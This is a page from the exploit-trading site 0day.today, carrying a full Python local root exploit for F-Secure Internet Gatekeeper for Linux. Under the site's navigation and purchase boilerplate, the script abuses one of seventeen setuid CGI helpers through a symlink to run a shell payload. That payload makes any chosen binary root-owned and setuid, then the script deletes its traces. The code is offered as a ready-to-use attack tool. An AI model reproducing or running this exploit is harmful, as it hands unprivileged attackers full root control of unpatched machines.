0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit
==================================================================== F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit ==================================================================== #!/usr/bin/env python # # F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 # F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke # ############################################################################## ## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit ## acknowledgements: everyone in pure-elite and uDc. ## ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] ############################################################################## ############################################################################## ## Make proper checks and import nessesary calls from modules. ## try: from sys import argv except Exception: print "the 'sys' module could not be loaded" raise SystemExit try: from os import unlink, stat, error, symlink, system, chmod except Exception: print "the 'os' module could not be loaded" raise SystemExit try: import getopt except Exception: print "the 'getopt' module could not be loaded" raise SystemExit ############################################################################## ## Constants. ## __program__ = argv[0] __version__ = "0.1beta" __author__ = "<xavier@tigerteam.se>" __lastedit__ = "Thu Sep 22 23:18:39 EDT 2005" __usage__ = """usage: %s [-options] options: --version show program's version number and exit. -h, --help show this help message and exit. -s, --suid file location to suid. -d, --dir cgi directory. -c, --clean cleans any left over files from the environment creation. -# enter numerical value of vulnerable file to exploit. [list below] 1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi 10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi 13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi 16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__) ####################################################################################### ## Functions. ## def _write(file, payload): try: open(file, 'w').write(payload) chmod(file, 0100) except Exception, err: print ("[-] %s" % (err)) def _exists(path): try: stat(path) except error: return False return True def _handleopts(): for opt in argv[1:]: if opt in ("-h", "--help"): print "%s" % (__usage__), raise SystemExit if opt in ("-v", "--version"): print "%s (%s)" % (__version__, __lastedit__), raise SystemExit _method_ = 'ifconfig_suid.cgi' _file_ = 'ifconfig.cgi' for opt in argv[1:]: if opt == "-1": _method_ = 'ifconfig_suid.cgi' elif opt == "-2": _method_ = 'reboot_suid.cgi' _file_ = 'reboot.cgi' elif opt == "-3": _method_ = 'proxy_suid.cgi' _file_ = 'proxy.cgi' elif opt == "-4": _method_ = 'edittmpl_suid.cgi' _file_ = 'edittmpl.cgi' elif opt == "-5": _method_ = 'version_suid.cgi' _file_ = 'version.cgi' elif opt == "-6": _method_ = 'hostname_suid.cgi' _file_ = 'hostname.cgi' elif opt == "-7": _method_ = 'gateway_suid.cgi' _file_ = 'gateway.cgi' elif opt == "-8": _method_ = 'halt_suid.cgi' _file_ = 'halt.cgi' elif opt == "-9": _method_ = 'edituserdb_suid.cgi' _file_ = 'edituserdb.cgi' elif opt == "-10": _method_ = 'htpasswd_suid.cgi' _file_ = 'htpasswd.cgi' elif opt == "-11": _method_ = 'pattern_up_suid.cgi' _file_ = 'pattern_up.cgi' elif opt == "-12": _method_ = 'license_suid.cgi' _file_ = 'license.cgi' elif opt == "-13": _method_ = 'iptables_suid.cgi' _file_ = 'iptables.cgi' elif opt == "-14": _method_ = 'dns_suid.cgi' _file_ = 'dns.cgi' elif opt == "-15": _method_ = 'pattern_autoup_suid.cgi' _file_ = 'pattern_autoup.cgi' elif opt == "-16": _method_ = 'spam_list_suid.cgi' _file_ = 'spam_list.cgi' elif opt == "-17": _method_ = 'diag_suid.cgi' _file_ = 'diag.cgi' else: pass try: opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \ 'suid=', \ 'dir='])[0] except Exception, (err): print "[-] %s" % (err), raise SystemExit _dir_ = None _payload_ = None _combine_ = None for o, a in opts: if o in ("-c", "--clean"): _clean() print "[*] done" raise SystemExit if o in ("-d", "--dir"): if _exists(a): _dir_ = a else: print "[-] unable to access the %s directory" % (_dir_), raise SystemExit if o in ("-s", "--suid"): if _exists(a): _payload_ = _suid(a) else: print "[-] unable to access binary." raise SystemExit if _dir_ == None: print "[-] no directory was given [try -h for help menu]" raise SystemExit if _payload_ == None: print "[-] enter binary to suid [try -h for help menu]" raise SystemExit _combined_ = "%s/%s" % (_dir_, _method_) if not _exists(_combined_): print "[-] method not possible, try another." raise SystemExit print "[*] creating environment..." try: symlink('%s/%s' % (_dir_, _method_), 'runbad') _write(_file_, _payload_) except Exception, err: raise SystemExit def _suid(file): _suid_ = """#!/bin/sh chown 0.0 %(file)s chmod 4755 %(file)s """ % (locals()) return _suid_ def _clean(): try: files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi', 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi', 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 'spam_list.cgi', 'diag_suid.cgi'] for file in files: if _exists(file): unlink(file) except Exception, err: print "[-] %s" % (err), ############################################################################## ## main() // main code. ## def main(): try: print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__) print "[*] handling options, arguments..." _handleopts() print "[*] executing exploit..." system('./runbad') print "[*] cleaning..." _clean() print "[*] done... try executing the specified binary." except KeyboardInterrupt: print "[-] caught keyboard interuption" raise SystemExit except Exception, (err): _clean() raise SystemExit if __name__ == '__main__': main() # 0day.today [2024-12-23] #